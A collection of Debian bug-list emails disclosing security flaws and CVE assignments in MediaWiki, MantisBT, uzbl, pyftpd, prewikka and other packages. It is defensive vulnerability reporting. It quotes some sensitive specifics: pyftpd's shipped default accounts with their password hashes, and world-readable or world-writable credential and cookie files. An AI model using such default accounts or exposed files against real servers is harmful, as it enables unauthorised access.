Bug#666269: mediawiki: security release CVE-2012-1578/CVE-2012-1579/CVE-2012-1580/CVE-2012-1581/CVE-2012-1582
Package: mediawiki Version: 1.18.1-1 Severity: critical Tags: security Release announcement: http://lists.wikimedia.org/pipermail/wikitech-l/2012-March/059230.html Requested CVE-identifiers in here: http://seclists.org/oss-sec/2012/q1/728 CVE-identifiers assigned in here: http://seclists.org/oss-sec/2012/q1/745 CVE-2012-1578 https://bugzilla.wikimedia.org/show_bug.cgi?id=34212 CVE-2012-1579 https://bugzilla.wikimedia.org/show_bug.cgi?id=34907 CVE-2012-1580 https://bugzilla.wikimedia.org/show_bug.cgi?id=35317 CVE-2012-1581 https://bugzilla.wikimedia.org/show_bug.cgi?id=35078 CVE-2012-1582 https://bugzilla.wikimedia.org/show_bug.cgi?id=35315 - Henri Salo -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#664990: More information
More information from Timo Warns: - Only libzip 0.10 is affected. - Stefan Cornelius has identified the precise commits that introduced the vulnerabilities: https://bugzilla.redhat.com/show_bug.cgi?id=802564 https://bugzilla.redhat.com/show_bug.cgi?id=803028 - As PHP and zipruby include older versions of libzip, they are not affected by the issues. -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#662858: CVEs
Detailed summary in here: http://seclists.org/oss-sec/2012/q1/574 A list of CVE-identifiers below: CVE-2012-1118 MantisBT 1.2.8 10124 array value for $g_private_bug_threshold configuration option allows bypass of access checks CVE-2012-1119 MantisBT 1.2.8 13816 copy/clone bug report action failed to leave an audit trail CVE-2012-1120 MantisBT 1.2.8 13656 elete_bug_threshold/bugnote_allow_user_edit_delete access check bypass via SOAP API CVE-2012-1121 MantisBT 1.2.8 13561 managers of specific projects could update global category settings CVE-2012-1122 MantisBT 1.2.8 13748 incorrect access checks performed when moving bugs between projects CVE-2012-1123 MantisBT 1.2.8 13901 SOAP API null password authentication bypass - Henri Salo -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#659379: uzbl: world-readable (and writable!) cookie jar
On Sat, Feb 11, 2012 at 01:25:18PM +0100, Jakub Wilk wrote: * Henri Salo he...@nerv.fi, 2012-02-11, 14:11: $ ls -ld ~/.local/{,share/{,uzbl/{,cookies.txt}}} drwxr-xr-x 3 user users 4096 Feb 9 23:29 /home/user/.local/ drwxr-xr-x 4 user users 4096 Feb 9 23:29 /home/user/.local/share/ drwxr-xr-x 2 user users 4096 Feb 9 23:29 /home/user/.local/share/uzbl/ -rw-rw-rw- 1 user users 732 Feb 9 23:29 /home/user/.local/share/uzbl/cookies.txt This allows local users to steal cookies (and tamper with them). Does this security-issue have CVE-identifier? I can request one from oss-security mailing list if ID hasn't been assigned. It's been already requested, but not assigned yet AFAICS: http://seclists.org/oss-sec/2012/q1/406 -- Jakub Wilk Ok. Thank you for fast reply. Please contact me if you need testing or other help. - Henri Salo -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#659379: [Secure-testing-team] Bug#659379: uzbl: world-readable (and writable!) cookie jar
On Fri, Feb 10, 2012 at 05:09:13PM +0100, Jakub Wilk wrote: Package: uzbl Version: 0.0.0~git.20100403-3 Severity: grave Tags: security Justification: user security hole $ ls -ld ~/.local/{,share/{,uzbl/{,cookies.txt}}} drwxr-xr-x 3 user users 4096 Feb 9 23:29 /home/user/.local/ drwxr-xr-x 4 user users 4096 Feb 9 23:29 /home/user/.local/share/ drwxr-xr-x 2 user users 4096 Feb 9 23:29 /home/user/.local/share/uzbl/ -rw-rw-rw- 1 user users 732 Feb 9 23:29 /home/user/.local/share/uzbl/cookies.txt This allows local users to steal cookies (and tamper with them). -- Jakub Wilk Does this security-issue have CVE-identifier? I can request one from oss-security mailing list if ID hasn't been assigned. - Henri Salo -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#656388: tucan
CVE-2012-0063 is assigned to this case. -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#585773: CVE-2010-2072
CVE-2010-2072 is assigned for this issue. -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#585776: CVE-2010-2073
CVE-2010-2073 is assigned for this issue. -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#585773: pyftpd: Insecure usage of temporary directory
Package: pyftpd Version: 0.8.4.6 Severity: critical Justification: causes serious data loss *** Please type your report below this line *** Pyftpd creates log-file to a temporary directory using predictable name. This allows a local attacker to create a denial of service condition and discloses sensitive information to unprivileged users. For example accounts of other users connecting to server and paths they visit. One should use tempfile.mkstemp http://docs.python.org/library/tempfile.html#tempfile.mkstemp or use /var/log/ -directory instead of /tmp/ and use proper file system modes for the log-file. -- System Information: Debian Release: 5.0.4 APT prefers stable APT policy: (500, 'stable') Architecture: amd64 (x86_64) Kernel: Linux 2.6.26-2-amd64 (SMP w/8 CPU cores) Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) (ignored: LC_ALL set to en_US.UTF-8) Shell: /bin/sh linked to /bin/bash Versions of packages pyftpd depends on: ii python2.5.2-3An interactive high-level object-o ii python-central0.6.8 register and build utility for Pyt Versions of packages pyftpd recommends: ii python-tk 2.5.2-1Tkinter - Writing Tk applications pyftpd suggests no packages. -- no debconf information -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#585776: pyftpd: Default username and password vulnerability
Package: pyftpd Version: 0.8.4.6 Severity: critical Justification: root security hole Tags: security *** Please type your report below this line *** File /etc/pyftpd/auth_db_config.py contains: passwd = [('test', 'test', 'CY9rzUYh03PK3k6DJie09g=='), ('user', 'users', '7hHLsZBS5AsHqsDKBgwj7g=='), ('roxon', 'users', 'ItZ2pB7rPmzFV6hrtdnZ7A==')] These accounts can be used to login to the FTP-server and read arbitrary files and list directories. File perm_acl_config.py lists user permissions. -- System Information: Debian Release: 5.0.4 APT prefers stable APT policy: (500, 'stable') Architecture: amd64 (x86_64) Kernel: Linux 2.6.26-2-amd64 (SMP w/8 CPU cores) Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) (ignored: LC_ALL set to en_US.UTF-8) Shell: /bin/sh linked to /bin/bash Versions of packages pyftpd depends on: ii python2.5.2-3An interactive high-level object-o ii python-central0.6.8 register and build utility for Pyt Versions of packages pyftpd recommends: ii python-tk 2.5.2-1Tkinter - Writing Tk applications pyftpd suggests no packages. -- no debconf information -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#585773: Acknowledgement (pyftpd: Insecure usage of temporary directory)
Email from http://packages.debian.org/changelogs/pool/main/p/pyftpd/current/copyright says: host mailgw.fmph.uniba.sk[158.195.16.250] said: 550 Previous (cached) callout verification failure (in reply to RCPT TO command) Best regards, Henri Salo -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#584469: prewikka: Permission security vulnerability
Package: prewikka Version: 0.9.14-2 Severity: critical Justification: causes serious data loss *** Please type your report below this line *** The permissions of the prewikka.conf file are world readable and contain the SQL-database password used by prewikka. This update makes it readable just by the apache group. References: https://dev.prelude-technologies.com/projects/prewikka/repository/revisions/17e38c310410be1b7811152172cda4438936063d https://www.redhat.com/archives/fedora-package-announce/2009-April/msg00771.html https://bugs.gentoo.org/show_bug.cgi?id=270056 This has CVE-2010-2058 assigned. -- System Information: Debian Release: 5.0.4 APT prefers stable APT policy: (500, 'stable') Architecture: amd64 (x86_64) Kernel: Linux 2.6.26-2-amd64 (SMP w/8 CPU cores) Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) (ignored: LC_ALL set to en_US.UTF-8) Shell: /bin/sh linked to /bin/bash -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org